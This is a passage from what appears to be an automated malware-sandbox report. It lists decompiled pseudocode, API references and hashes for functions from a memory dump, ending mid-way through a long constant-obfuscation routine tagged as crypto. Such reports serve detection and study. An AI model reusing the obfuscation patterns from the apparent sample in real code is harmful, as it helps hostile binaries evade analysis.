				if(_t18 >= 0) {
					_t11 = E1003F999(_t13, _t16, __ecx, (_t18 + 1) * _a8 + 0x10); // executed
					if(_t11 == 0) {
						goto L1;
					}
					 *(_t11 + 4) =  *(_t11 + 4) & 0x00000000;
					 *_t11 = _t17;
					 *((intOrPtr*)(_t11 + 0xc)) = 1;
					 *((intOrPtr*)(_t11 + 8)) = _t18;
					return _t11;
				}
				L1:
				return 0;
			}

0x10009a60
0x10009a64
0x10009a68
0x10009a79
0x10009a81
0x00000000
0x00000000
0x10009a83
0x10009a87
0x10009a89
0x10009a90
0x00000000
0x10009a90
0x10009a6a
0x00000000

APIs

_malloc.LIBCMT ref: 10009A79

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 0749f7de267607b69d61fa59e314900fab8009bd6f4f0ec9360905a37d0de8ce
Instruction ID: 0fad47908fd3aaf209922146c49a4f081954e31c6d41c0a2fe37b0a433f43669
Opcode Fuzzy Hash: 0749f7de267607b69d61fa59e314900fab8009bd6f4f0ec9360905a37d0de8ce
Instruction Fuzzy Hash: A8E06D766106166FD700CF59D404B4AB7ECEF923B1F1AC42AE804CB152CAB1E9048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10028772, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10028779

Part of subcall function 10026F7B: EnterCriticalSection.KERNEL32(100944C0,00000000,?,?,?,1002878D,00000010,00000008,1001F136,1001F0D9,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10026FB5
Part of subcall function 10026F7B: InitializeCriticalSection.KERNEL32(?,?,?,?,1002878D,00000010,00000008,1001F136,1001F0D9,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10026FC7
Part of subcall function 10026F7B: LeaveCriticalSection.KERNEL32(100944C0,?,?,?,1002878D,00000010,00000008,1001F136,1001F0D9,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10026FD4
Part of subcall function 10026F7B: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,1002878D,00000010,00000008,1001F136,1001F0D9,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10026FE4

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: 290023c0c57bcb58731d1b986515de5b723157a11791fb890f7593ffc32a4778
Instruction ID: 3356ccc5f641145b0894515161bf7dba86b3f848e3042a07658a9b826da162bf
Opcode Fuzzy Hash: 290023c0c57bcb58731d1b986515de5b723157a11791fb890f7593ffc32a4778
Instruction Fuzzy Hash: A9E04F38300205EBEBA0DFA8E942B8CB7E0EF04390F604638F5D0DB2D0DA70DA409710

Uniqueness

Uniqueness Score: -1.00%

Function 100462F5, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100462F5(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x100949e0 = _t6;
				if(_t6 != 0) {
					 *0x10096378 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x1004630a
0x10046310
0x10046317
0x1004631e
0x10046324
0x1004631a
0x1004631a
0x1004631a

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,?,1003FD69,00000001,?,?,?,1003FEE2,?,?,?,10068A68,0000000C,1003FF9D), ref: 1004630A

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 4f4b92083ffc0a87c55c13be27f6c3a4fefe579dc4d780aba848513afd2c61d2
Instruction ID: 88613d68640ae65d482637b78db73cc8911487efe30ae663e41df4ed4cffefb2
Opcode Fuzzy Hash: 4f4b92083ffc0a87c55c13be27f6c3a4fefe579dc4d780aba848513afd2c61d2
Instruction Fuzzy Hash: 88D05E765543559AFB009F70AC49B633BDCE388695F144436F80DC6150FA70C680C504

Uniqueness

Uniqueness Score: -1.00%

Function 100429DA, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 100429E0

Part of subcall function 10042898: __lock.LIBCMT ref: 100428A6
Part of subcall function 10042898: __decode_pointer.LIBCMT ref: 100428DD
Part of subcall function 10042898: __decode_pointer.LIBCMT ref: 100428F2
Part of subcall function 10042898: __decode_pointer.LIBCMT ref: 1004291C
Part of subcall function 10042898: __decode_pointer.LIBCMT ref: 10042932
Part of subcall function 10042898: __decode_pointer.LIBCMT ref: 1004293F
Part of subcall function 10042898: __initterm.LIBCMT ref: 1004296E
Part of subcall function 10042898: __initterm.LIBCMT ref: 1004297E

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 71f5aa3ab10afe7edc69d9e50ae3ebcb4a9bdbb1c92fe6d79654d1a4b596b58f
Instruction ID: 33b799078897dd6700c17c3bff734e109f367e2234b8243054c69bc1303cd3fc
Opcode Fuzzy Hash: 71f5aa3ab10afe7edc69d9e50ae3ebcb4a9bdbb1c92fe6d79654d1a4b596b58f
Instruction Fuzzy Hash: 93A002E9BD530521FC6095502C43F6821019750F01FE40064BB086C1C1F8D62298445B

Uniqueness

Uniqueness Score: -1.00%

Function 1004719C, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 1004719E

Part of subcall function 1004712A: TlsGetValue.KERNEL32(00000000,?,100471A3,00000000,1004D1FA,10094B50,00000000,00000314,?,100479D5,10094B50,Microsoft Visual C++ Runtime Library,00012010), ref: 1004713C
Part of subcall function 1004712A: TlsGetValue.KERNEL32(00000006,?,100471A3,00000000,1004D1FA,10094B50,00000000,00000314,?,100479D5,10094B50,Microsoft Visual C++ Runtime Library,00012010), ref: 10047153
Part of subcall function 1004712A: RtlEncodePointer.NTDLL(00000000,?,100471A3,00000000,1004D1FA,10094B50,00000000,00000314,?,100479D5,10094B50,Microsoft Visual C++ Runtime Library,00012010), ref: 10047191

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 81878a7845c1c964afb69eb1305228c2ac52f837ed8682a7d118aac95fe1c2c6
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 048D17CB, Relevance: 1.3, APIs: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 048D188D

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 6b30f11f1840f48d84419230f6c47e2ac53984c29ba3d6d4f84262ff56d8df96
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: C72115B5D0020CFBDB04DFA8D94A9EEBBB4EB44304F108189E425A7250E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 048D577E, Relevance: 27.4, Strings: 21, Instructions: 1137
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E048D577E() {
				char _v24;
				signed int _v40;
				char _v68;
				signed int _v76;
				char _v100;
				signed int _v124;
				signed int _v136;
				signed int _v140;
				signed int _v148;
				intOrPtr _v152;
				signed int _v156;
				char _v164;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				unsigned int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				unsigned int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				unsigned int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				unsigned int _v352;
				signed int _v356;
				unsigned int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				unsigned int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				unsigned int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _t1203;
				signed int _t1228;
				void* _t1236;
				void* _t1257;
				signed int _t1274;
				void* _t1278;
				signed int _t1279;
				signed int _t1280;
				signed int _t1281;
				signed int _t1282;
				signed int _t1283;
				signed int _t1284;
				signed int _t1285;
				signed int _t1286;
				signed int _t1287;
				signed int _t1288;
				signed int _t1289;
				signed int _t1290;
				signed int _t1291;
				signed int _t1292;
				signed int _t1293;
				signed int _t1294;
				signed int _t1295;
				signed int _t1296;
				signed int _t1297;
				signed int _t1298;
				signed int _t1299;
				signed int _t1300;
				signed int _t1301;
				signed int _t1302;
				signed int _t1303;
				signed int _t1304;
				signed int _t1305;
				signed int _t1418;
				signed int _t1419;
				signed int _t1425;
				void* _t1427;
				signed int _t1431;
				signed int _t1455;
				void* _t1457;
				void* _t1460;
				void* _t1461;
				void* _t1462;

				_t1457 = (_t1455 & 0xfffffff8) - 0x290;
				_v464 = 0x824775;
				_v464 = _v464 | 0xf4ce1248;
				_t1279 = 0x16;
				_v464 = _v464 / _t1279;
				_v464 = _v464 ^ 0x0b20a7e0;
				_t1427 = 0x9128461;
				_v656 = 0xeb14ec;
				_v656 = _v656 + 0xffffa9c6;
				_t1280 = 0x30;
				_t1274 = 0x51;
				_v656 = _v656 * 0x6e;
				_v656 = _v656 + 0xffff39d4;
				_v656 = _v656 ^ 0x64dd2a50;
				_v480 = 0x9df1b2;
				_v480 = _v480 | 0xbf3fdcff;
				_v480 = _v480 ^ 0xbfbffdff;
				_v440 = 0x5b8256;
				_v440 = _v440 + 0xcf37;
				_v440 = _v440 / _t1280;
				_v440 = _v440 ^ 0x000912f3;
				_v612 = 0x456813;
				_t1281 = 0x26;
				_v612 = _v612 * 0x61;
				_v612 = _v612 << 5;
				_v612 = _v612 + 0x145c;
				_v612 = _v612 ^ 0x498cca84;
				_v388 = 0xf794ba;
				_v388 = _v388 << 0xb;
				_v388 = _v388 / _t1274;
				_v388 = _v388 ^ 0x0254abdb;
				_v356 = 0x6751c8;
				_v356 = _v356 << 7;
				_v356 = _v356 + 0xffff2f8f;
				_v356 = _v356 ^ 0x33a22b41;
				_v592 = 0xf5f6bf;
				_v592 = _v592 << 5;
				_v592 = _v592 + 0x7ad9;
				_v592 = _v592 | 0x752e76b5;
				_v592 = _v592 ^ 0x7fbe3031;
				_v528 = 0xf93da1;
				_v528 = _v528 / _t1281;
				_t1282 = 0xd;
				_v528 = _v528 / _t1282;
				_v528 = _v528 * 0x7d;
				_v528 = _v528 ^ 0x00334431;
				_v196 = 0x5ca728;
				_v196 = _v196 ^ 0x3e9890fc;
				_v196 = _v196 ^ 0x3ec71672;
				_v268 = 0x9aab1d;
				_v268 = _v268 + 0xffff4f6b;
				_v268 = _v268 ^ 0x0095c1d2;
				_v428 = 0x82cc96;
				_v428 = _v428 + 0x22b1;
				_v428 = _v428 + 0xffffa7e2;
				_v428 = _v428 ^ 0x008b49e2;
				_v604 = 0x2e3db0;
				_v604 = _v604 + 0xfe08;
				_t1283 = 0x1a;
				_v604 = _v604 / _t1283;
				_t1284 = 0x59;
				_v604 = _v604 / _t1284;
				_v604 = _v604 ^ 0x000844a4;
				_v424 = 0x5bd8c1;
				_v424 = _v424 >> 7;
				_v424 = _v424 + 0x2625;
				_v424 = _v424 ^ 0x0002acf2;
				_v296 = 0x394c59;
				_v296 = _v296 >> 8;
				_v296 = _v296 ^ 0x0007a8c8;
				_v304 = 0x853b79;
				_v304 = _v304 << 0xd;
				_v304 = _v304 ^ 0xa76b95fa;
				_v596 = 0x70ddc;
				_v596 = _v596 + 0xffff539b;
				_v596 = _v596 | 0x1f4010c2;
				_v596 = _v596 + 0x62b1;
				_v596 = _v596 ^ 0x1f40e17a;
				_v416 = 0x1fddc3;
				_t1285 = 0x3c;
				_v416 = _v416 * 0x28;
				_v416 = _v416 | 0xfd6e7dea;
				_v416 = _v416 ^ 0xfdf30a8d;
				_v384 = 0x1c9c37;
				_v384 = _v384 >> 2;
				_v384 = _v384 | 0x1a693341;
				_v384 = _v384 ^ 0x1a6d1498;
				_v276 = 0xa6072;
				_t165 =  &_v276; // 0xa6072
				_v276 =  *_t165 / _t1285;
				_v276 = _v276 ^ 0x000097da;
				_v256 = 0x116684;
				_t1286 = 0x43;
				_v256 = _v256 / _t1286;
				_v256 = _v256 ^ 0x0006d384;
				_v392 = 0x500107;
				_t1287 = 0x7b;
				_v392 = _v392 / _t1287;
				_v392 = _v392 ^ 0x6a54f113;
				_v392 = _v392 ^ 0x6a54c6f2;
				_v228 = 0x98ed12;
				_v228 = _v228 ^ 0x314dc832;
				_v228 = _v228 ^ 0x31da2c3a;
				_v512 = 0xf160ea;
				_t1288 = 0x32;
				_v512 = _v512 / _t1288;
				_v512 = _v512 << 6;
				_v512 = _v512 + 0xffff2343;
				_v512 = _v512 ^ 0x0132148d;
				_v200 = 0x18cadc;
				_v200 = _v200 + 0xffff7898;
				_v200 = _v200 ^ 0x001da22f;
				_v372 = 0x3ab003;
				_t1418 = 0x2e;
				_v372 = _v372 / _t1418;
				_t1289 = 0x52;
				_v372 = _v372 * 0x2d;
				_v372 = _v372 ^ 0x0033f7e5;
				_v220 = 0x921bdd;
				_v220 = _v220 + 0xffffb27e;
				_v220 = _v220 ^ 0x00943619;
				_v600 = 0xb6ccb4;
				_v600 = _v600 | 0x2cc9304a;
				_v600 = _v600 + 0x2f52;
				_v600 = _v600 + 0xe808;
				_v600 = _v600 ^ 0x2d0ac47b;
				_v312 = 0x65122d;
				_v312 = _v312 + 0xffff65df;
				_v312 = _v312 ^ 0x006afa6b;
				_v620 = 0x32d96d;
				_v620 = _v620 + 0x3bc8;
				_v620 = _v620 | 0xdec6debf;
				_v620 = _v620 ^ 0xdef4a963;
				_v488 = 0xe0be7f;
				_v488 = _v488 >> 0xd;
				_v488 = _v488 ^ 0xc942f524;
				_v488 = _v488 ^ 0xc94ef9a5;
				_v492 = 0x17c9b1;
				_v492 = _v492 << 1;
				_v492 = _v492 * 0x49;
				_v492 = _v492 ^ 0x0d90b4f5;
				_v516 = 0x7e72bd;
				_v516 = _v516 << 4;
				_v516 = _v516 + 0xd1ea;
				_v516 = _v516 * 0x4b;
				_v516 = _v516 ^ 0x50f43a66;
				_v524 = 0xcc9e95;
				_v524 = _v524 | 0x288ce2da;
				_v524 = _v524 / _t1289;
				_v524 = _v524 + 0xfffff98c;
				_v524 = _v524 ^ 0x007d035c;
				_v224 = 0xd176b8;
				_v224 = _v224 ^ 0x234d6d31;
				_v224 = _v224 ^ 0x239eb650;
				_v532 = 0x4b4764;
				_v532 = _v532 >> 6;
				_v532 = _v532 | 0xa9a5f0a1;
				_v532 = _v532 + 0xffffd9a4;
				_v532 = _v532 ^ 0xa9a7eda1;
				_v564 = 0xb486e9;
				_v564 = _v564 ^ 0x7d78e01a;
				_v564 = _v564 >> 4;
				_t1290 = 0x7e;
				_v564 = _v564 * 0x3a;
				_v564 = _v564 ^ 0xc80a676e;
				_v608 = 0x4da438;
				_v608 = _v608 + 0xfffff5f1;
				_v608 = _v608 / _t1290;
				_v608 = _v608 ^ 0x391b81fb;
				_v608 = _v608 ^ 0x3913dcf4;
				_v292 = 0xeca340;
				_v292 = _v292 + 0xd406;
				_v292 = _v292 ^ 0x00e60de5;
				_v244 = 0x9935f4;
				_t1291 = 0x6d;
				_v244 = _v244 / _t1291;
				_v244 = _v244 ^ 0x000602ef;
				_v568 = 0x1b59a3;
				_v568 = _v568 + 0xffffda3c;
				_v568 = _v568 / _t1291;
				_t1292 = 0x5f;
				_v568 = _v568 * 0x6f;
				_v568 = _v568 ^ 0x0012dcd4;
				_v380 = 0xe3a892;
				_v380 = _v380 << 8;
				_v380 = _v380 >> 1;
				_v380 = _v380 ^ 0x71d58de7;
				_v324 = 0x75b16d;
				_v324 = _v324 ^ 0x5772578a;
				_v324 = _v324 ^ 0x5701c761;
				_v404 = 0x3b5463;
				_v404 = _v404 >> 6;
				_v404 = _v404 | 0x4ca4b14e;
				_v404 = _v404 ^ 0x4cab3161;
				_v632 = 0xba11d3;
				_v632 = _v632 << 1;
				_v632 = _v632 / _t1418;
				_v632 = _v632 * 0x78;
				_v632 = _v632 ^ 0x03c034c4;
				_v316 = 0xe75391;
				_v316 = _v316 + 0xffff3c43;
				_v316 = _v316 ^ 0x00e250c9;
				_v460 = 0x28752;
				_v460 = _v460 << 0xe;
				_v460 = _v460 ^ 0xd47ca498;
				_v460 = _v460 ^ 0x75a92cd2;
				_v452 = 0x7cbb67;
				_v452 = _v452 >> 0xe;
				_v452 = _v452 * 0x4f;
				_v452 = _v452 ^ 0x00054169;
				_v204 = 0x38b73d;
				_v204 = _v204 | 0x990e3a0f;
				_v204 = _v204 ^ 0x993fe3e3;
				_v236 = 0x524821;
				_v236 = _v236 << 0xd;
				_v236 = _v236 ^ 0x490dd32e;
				_v308 = 0x2957ef;
				_v308 = _v308 * 0x1f;
				_v308 = _v308 ^ 0x050b138d;
				_v504 = 0x652f8f;
				_v504 = _v504 << 8;
				_v504 = _v504 / _t1274;
				_v504 = _v504 / _t1292;
				_v504 = _v504 ^ 0x0006c444;
				_v300 = 0xd78d8b;
				_v300 = _v300 << 2;
				_v300 = _v300 ^ 0x035e80b1;
				_v624 = 0x35553b;
				_v624 = _v624 ^ 0x395d48e4;
				_t443 =  &_v624; // 0x395d48e4
				_t1293 = 0x6f;
				_v624 =  *_t443 / _t1293;
				_v624 = _v624 ^ 0x31a8bfbb;
				_v624 = _v624 ^ 0x312f0a9e;
				_v364 = 0xd1d5f0;
				_t1419 = 0x2b;
				_t1294 = 0x7d;
				_v364 = _v364 * 0x63;
				_v364 = _v364 >> 4;
				_v364 = _v364 ^ 0x05189ef6;
				_v580 = 0x14eecd;
				_v580 = _v580 * 0x4e;
				_v580 = _v580 << 3;
				_v580 = _v580 * 0x6d;
				_v580 = _v580 ^ 0xb997e56a;
				_v572 = 0xcdc506;
				_v572 = _v572 ^ 0xcede99d8;
				_v572 = _v572 >> 0xd;
				_v572 = _v572 >> 1;
				_v572 = _v572 ^ 0x000630d7;
				_v280 = 0xe6046e;
				_v280 = _v280 + 0x9296;
				_v280 = _v280 ^ 0x00ec8e25;
				_v540 = 0x40ca57;
				_v540 = _v540 + 0x2267;
				_v540 = _v540 + 0xfe06;
				_v540 = _v540 + 0xf2ab;
				_v540 = _v540 ^ 0x00420313;
				_v548 = 0xc824b2;
				_v548 = _v548 + 0xffff1921;
				_v548 = _v548 | 0x10558cb3;
				_v548 = _v548 / _t1419;
				_v548 = _v548 ^ 0x006c7cd7;
				_v376 = 0x1589ed;
				_v376 = _v376 / _t1294;
				_v376 = _v376 + 0xffffad95;
				_v376 = _v376 ^ 0xfffd5564;
				_v248 = 0x731c8e;
				_v248 = _v248 << 9;
				_v248 = _v248 ^ 0xe639840a;
				_v588 = 0x68cab3;
				_v588 = _v588 << 8;
				_v588 = _v588 * 0x78;
				_v588 = _v588 ^ 0x01fc55c9;
				_v588 = _v588 ^ 0x1ef54ae2;
				_v408 = 0xb0112;
				_v408 = _v408 + 0xa834;
				_v408 = _v408 << 6;
				_v408 = _v408 ^ 0x02ee306c;
				_v436 = 0x66c5a3;
				_v436 = _v436 << 6;
				_v436 = _v436 / _t1419;
				_v436 = _v436 ^ 0x00958e12;
				_v556 = 0x32a5c5;
				_v556 = _v556 ^ 0xdb018125;
				_v556 = _v556 ^ 0x836f7016;
				_v556 = _v556 * 0x5e;
				_v556 = _v556 ^ 0x71ee7f44;
				_v232 = 0x7dcf08;
				_v232 = _v232 ^ 0x3ef79315;
				_v232 = _v232 ^ 0x3e82b50e;
				_v240 = 0xffaa48;
				_v240 = _v240 * 0x39;
				_v240 = _v240 ^ 0x38e8e9e2;
				_v368 = 0x5cab8a;
				_v368 = _v368 + 0xffffe57f;
				_v368 = _v368 >> 6;
				_v368 = _v368 ^ 0x00064138;
				_v288 = 0xe3e012;
				_t1295 = 0x7a;
				_v288 = _v288 / _t1295;
				_v288 = _v288 ^ 0x0009185c;
				_v400 = 0x81de2f;
				_v400 = _v400 | 0x36f9fc56;
				_v400 = _v400 << 0xb;
				_v400 = _v400 ^ 0xcffafc4f;
				_v476 = 0x7e648d;
				_v476 = _v476 + 0xede8;
				_v476 = _v476 << 7;
				_v476 = _v476 ^ 0x3fa4ce2f;
				_v332 = 0x97c695;
				_v332 = _v332 ^ 0x6c5baa88;
				_v332 = _v332 ^ 0x6ccfb37b;
				_v252 = 0xc87404;
				_t1296 = 0x66;
				_v252 = _v252 / _t1296;
				_v252 = _v252 ^ 0x000d39ba;
				_v340 = 0xf01581;
				_v340 = _v340 >> 4;
				_v340 = _v340 ^ 0x00095e23;
				_v216 = 0x239ee2;
				_t1297 = 0x1d;
				_v216 = _v216 / _t1297;
				_v216 = _v216 ^ 0x00078d69;
				_v472 = 0x5a6c6e;
				_v472 = _v472 | 0x4c6b3df7;
				_v472 = _v472 + 0xffff164f;
				_v472 = _v472 ^ 0x4c773344;
				_v648 = 0x261e2;
				_t1298 = 0x50;
				_v648 = _v648 * 0x16;
				_v648 = _v648 >> 9;
				_v648 = _v648 ^ 0xb7138457;
				_v648 = _v648 ^ 0xb7162f7c;
				_v576 = 0xee6ff9;
				_v576 = _v576 + 0xfffff7f6;
				_v576 = _v576 << 9;
				_v576 = _v576 << 2;
				_v576 = _v576 ^ 0x7339d67e;
				_v352 = 0x86e5fa;
				_v352 = _v352 * 0x76;
				_v352 = _v352 >> 0x10;
				_v352 = _v352 ^ 0x000205f9;
				_v192 = 0xc62af3;
				_v192 = _v192 >> 6;
				_v192 = _v192 ^ 0x000fb1b1;
				_v520 = 0xa53a44;
				_v520 = _v520 >> 0xf;
				_v520 = _v520 / _t1298;
				_v520 = _v520 | 0x8f5b26e1;
				_v520 = _v520 ^ 0x8f5e1219;
				_v456 = 0x912dde;
				_v456 = _v456 << 2;
				_t1299 = 0xb;
				_v456 = _v456 / _t1299;
				_v456 = _v456 ^ 0x0032fd53;
				_v448 = 0x6f734;
				_v448 = _v448 >> 4;
				_v448 = _v448 << 9;
				_v448 = _v448 ^ 0x00d253bf;
				_v336 = 0xf08089;
				_v336 = _v336 + 0xe858;
				_v336 = _v336 ^ 0x00fcdc86;
				_v320 = 0x37424b;
				_v320 = _v320 | 0xffbd6d65;
				_v320 = _v320 ^ 0xffb56b99;
				_v644 = 0x4bb545;
				_v644 = _v644 + 0xffff34f7;
				_v644 = _v644 ^ 0x33e61954;
				_t1300 = 0x3a;
				_v644 = _v644 / _t1300;
				_v644 = _v644 ^ 0x00e0e491;
				_v396 = 0x503f29;
				_v396 = _v396 << 5;
				_v396 = _v396 >> 5;
				_v396 = _v396 ^ 0x005c4748;
				_v284 = 0xc2e86c;
				_v284 = _v284 ^ 0x445fa743;
				_v284 = _v284 ^ 0x449ac94c;
				_v208 = 0xd2505b;
				_v208 = _v208 >> 0xd;
				_v208 = _v208 ^ 0x000e2a4e;
				_v468 = 0x8b2e02;
				_v468 = _v468 * 0x15;
				_v468 = _v468 + 0xffff1712;
				_v468 = _v468 ^ 0x0b6df89c;
				_v348 = 0x68259d;
				_v348 = _v348 + 0xffffb73e;
				_v348 = _v348 ^ 0x0068298c;
				_v640 = 0x6fec8e;
				_v640 = _v640 << 0xf;
				_v640 = _v640 | 0x4cc5a568;
				_v640 = _v640 << 0x10;
				_v640 = _v640 ^ 0xa56d00c3;
				_v616 = 0x9d66eb;
				_v616 = _v616 << 9;
				_v616 = _v616 | 0xc78959e6;
				_v616 = _v616 >> 0xf;
				_v616 = _v616 ^ 0x000f3669;
				_v444 = 0xca94bf;
				_v444 = _v444 >> 0xb;
				_v444 = _v444 ^ 0x838c2c0a;
				_v444 = _v444 ^ 0x838c5dae;
				_v560 = 0x4fc470;
				_v560 = _v560 + 0xc60;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 << 0xf;
				_v560 = _v560 ^ 0x0046c3f7;
				_v496 = 0x1b89fb;
				_v496 = _v496 ^ 0x4cd7b05d;
				_v496 = _v496 + 0xffff90b6;
				_v496 = _v496 ^ 0x4cc22336;
				_v544 = 0xef1e90;
				_v544 = _v544 / _t1300;
